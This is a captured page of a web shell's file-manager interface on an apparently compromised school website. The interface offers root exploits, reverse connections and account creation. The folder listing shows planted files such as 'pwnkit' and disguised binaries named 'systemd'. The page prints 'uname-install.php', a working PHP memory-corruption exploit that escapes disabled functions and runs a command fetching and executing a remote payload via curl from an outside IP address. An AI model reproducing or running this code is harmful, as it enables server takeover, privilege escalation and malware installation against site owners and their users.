Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.144.89.152
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
khera /
images /
[ HOME SHELL ]
Name
Size
Permission
Action
Activities
[ DIR ]
drwxr-xr-x
gallery
[ DIR ]
drwxr-xr-x
journey
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
.prng
1.06
MB
-rw-r--r--
.prng.swp
23
B
-rw-r--r--
1.jpg
259.79
KB
-rw-r--r--
5.jpg
529.21
KB
-rw-r--r--
AA_kids-parallax.png
170.43
KB
-rw-r--r--
App-Baner.png
27.36
KB
-rw-r--r--
Dr-Veer-Ji.jpg
17.15
KB
-rw-r--r--
Dr-Veer-Ji1.jpg
46.75
KB
-rw-r--r--
Tree (1).png
693.4
KB
-rw-r--r--
bg.jpg
155.84
KB
-rw-r--r--
bg_1.jpg
132.3
KB
-rw-r--r--
bilga.png
9.72
KB
-rw-r--r--
campus.jpg
270.3
KB
-rw-r--r--
campus1.jpg
250.75
KB
-rw-r--r--
campus2.jpg
273.46
KB
-rw-r--r--
campus3.jpg
226.68
KB
-rw-r--r--
campus4.jpg
157.22
KB
-rw-r--r--
campus5.jpg
218.53
KB
-rw-r--r--
campus6.jpg
2.66
MB
-rw-r--r--
campus7.jpg
2.22
MB
-rw-r--r--
campus8.jpg
2.17
MB
-rw-r--r--
child.jpg
364.29
KB
-rw-r--r--
course_6.jpg
38.1
KB
-rw-r--r--
dymmy.jpg
488.6
KB
-rw-r--r--
favicon.jpg
15.25
KB
-rw-r--r--
fun.jpg
345.51
KB
-rw-r--r--
index.html
97.96
KB
-rw-r--r--
lab.jpg
1.97
MB
-rw-r--r--
logo.jpg
3.77
KB
-rw-r--r--
logo.png
2.92
KB
-rw-r--r--
medical_camps.jpg
32.29
KB
-rw-r--r--
new-1.jpg
90.51
KB
-rw-r--r--
principal.jpg
142.96
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
relief.jpg
47.63
KB
-rw-r--r--
santattar.jpg
20.25
KB
-rw-r--r--
santattar1.jpg
43.94
KB
-rw-r--r--
school (1).jpg
230.47
KB
-rw-r--r--
school (11).jpg
162.56
KB
-rw-r--r--
school (8).jpg
225.8
KB
-rw-r--r--
school (9).jpg
215.2
KB
-rw-r--r--
school.jpg
420.36
KB
-rw-r--r--
school2.jpg
398.5
KB
-rw-r--r--
schoolbus2.jpg
2.17
MB
-rw-r--r--
students.jpg
28.33
KB
-rw-r--r--
systemd
1.06
MB
-rw-r--r--
systemd.swp
23
B
-rw-r--r--
trans1.jpg
298.77
KB
-rw-r--r--
trans2.jpg
181.42
KB
-rw-r--r--
trans3.jpg
220.44
KB
-rw-r--r--
trans4.jpg
330.1
KB
-rw-r--r--
trans5.jpg
353.16
KB
-rw-r--r--
uname-install.php
5.28
KB
-rw-r--r--
women.jpg
76.52
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : uname-install.php
<?php new Pwn('bash -c "$(curl -fsSLk 142.171.64.163/666/xpRjct/PrVM0d)"'); class Helper { public $a, $b, $c; } class Pwn { const LOGGING = false; const CHUNK_DATA_SIZE = 0x60; const CHUNK_SIZE = ZEND_DEBUG_BUILD ? self::CHUNK_DATA_SIZE + 0x20 : self::CHUNK_DATA_SIZE; const STRING_SIZE = self::CHUNK_DATA_SIZE - 0x18 - 1; const HT_SIZE = 0x118; const HT_STRING_SIZE = self::HT_SIZE - 0x18 - 1; public function __construct($cmd) { for($i = 0; $i < 10; $i++) { $groom[] = self::alloc(self::STRING_SIZE); $groom[] = self::alloc(self::HT_STRING_SIZE); } $concat_str_addr = self::str2ptr($this->heap_leak(), 16); $fill = self::alloc(self::STRING_SIZE); $this->abc = self::alloc(self::STRING_SIZE); $abc_addr = $concat_str_addr + self::CHUNK_SIZE; self::log("abc @ 0x%x", $abc_addr); $this->free($abc_addr); $this->helper = new Helper; if(strlen($this->abc) < 0x1337) { self::log("uaf failed"); return; } $this->helper->a = "leet"; $this->helper->b = function($x) {}; $this->helper->c = 0xfeedface; $helper_handlers = $this->rel_read(0); self::log("helper handlers @ 0x%x", $helper_handlers); $closure_addr = $this->rel_read(0x20); self::log("real closure @ 0x%x", $closure_addr); $closure_ce = $this->read($closure_addr + 0x10); self::log("closure class_entry @ 0x%x", $closure_ce); $basic_funcs = $this->get_basic_funcs($closure_ce); self::log("basic_functions @ 0x%x", $basic_funcs); $zif_system = $this->get_system($basic_funcs); self::log("zif_system @ 0x%x", $zif_system); $fake_closure_off = 0x70; for($i = 0; $i < 0x138; $i += 8) { $this->rel_write($fake_closure_off + $i, $this->read($closure_addr + $i)); } $this->rel_write($fake_closure_off + 0x38, 1, 4); $handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68; $this->rel_write($fake_closure_off + $handler_offset, $zif_system); $fake_closure_addr = $abc_addr + $fake_closure_off + 0x18; self::log("fake closure @ 0x%x", $fake_closure_addr); $this->rel_write(0x20, $fake_closure_addr); ($this->helper->b)($cmd); $this->rel_write(0x20, $closure_addr); unset($this->helper->b); } private function heap_leak() { $arr = [[], []]; set_error_handler(function() use (&$arr, &$buf) { $arr = 1; $buf = str_repeat("\x00", self::HT_STRING_SIZE); }); $arr[1] .= self::alloc(self::STRING_SIZE - strlen("Array")); return $buf; } private function free($addr) { $payload = pack("Q*", 0xdeadbeef, 0xcafebabe, $addr); $payload .= str_repeat("A", self::HT_STRING_SIZE - strlen($payload)); $arr = [[], []]; set_error_handler(function() use (&$arr, &$buf, &$payload) { $arr = 1; $buf = str_repeat($payload, 1); }); $arr[1] .= "x"; } private function rel_read($offset) { return self::str2ptr($this->abc, $offset); } private function rel_write($offset, $value, $n = 8) { for ($i = 0; $i < $n; $i++) { $this->abc[$offset + $i] = chr($value & 0xff); $value >>= 8; } } private function read($addr, $n = 8) { $this->rel_write(0x10, $addr - 0x10); $value = strlen($this->helper->a); if($n !== 8) { $value &= (1 << ($n << 3)) - 1; } return $value; } private function get_system($basic_funcs) { $addr = $basic_funcs; do { $f_entry = $this->read($addr); $f_name = $this->read($f_entry, 6); if($f_name === 0x6d6574737973) { return $this->read($addr + 8); } $addr += 0x20; } while($f_entry !== 0); } private function get_basic_funcs($addr) { while(true) { // In rare instances the standard module might lie after the addr we're starting // the search from. This will result in a SIGSGV when the search reaches an unmapped page. // In that case, changing the direction of the search should fix the crash. // $addr += 0x10; $addr -= 0x10; if($this->read($addr, 4) === 0xA8 && in_array($this->read($addr + 4, 4), [20180731, 20190902, 20200930, 20210902])) { $module_name_addr = $this->read($addr + 0x20); $module_name = $this->read($module_name_addr); if($module_name === 0x647261646e617473) { self::log("standard module @ 0x%x", $addr); return $this->read($addr + 0x28); } } } } private function log($format, $val = "") { if(self::LOGGING) { printf("{$format}\n", $val); } } static function alloc($size) { return str_shuffle(str_repeat("A", $size)); } static function str2ptr($str, $p = 0, $n = 8) { $address = 0; for($j = $n - 1; $j >= 0; $j--) { $address <<= 8; $address |= ord($str[$p + $j]); } return $address; } } ?>
Close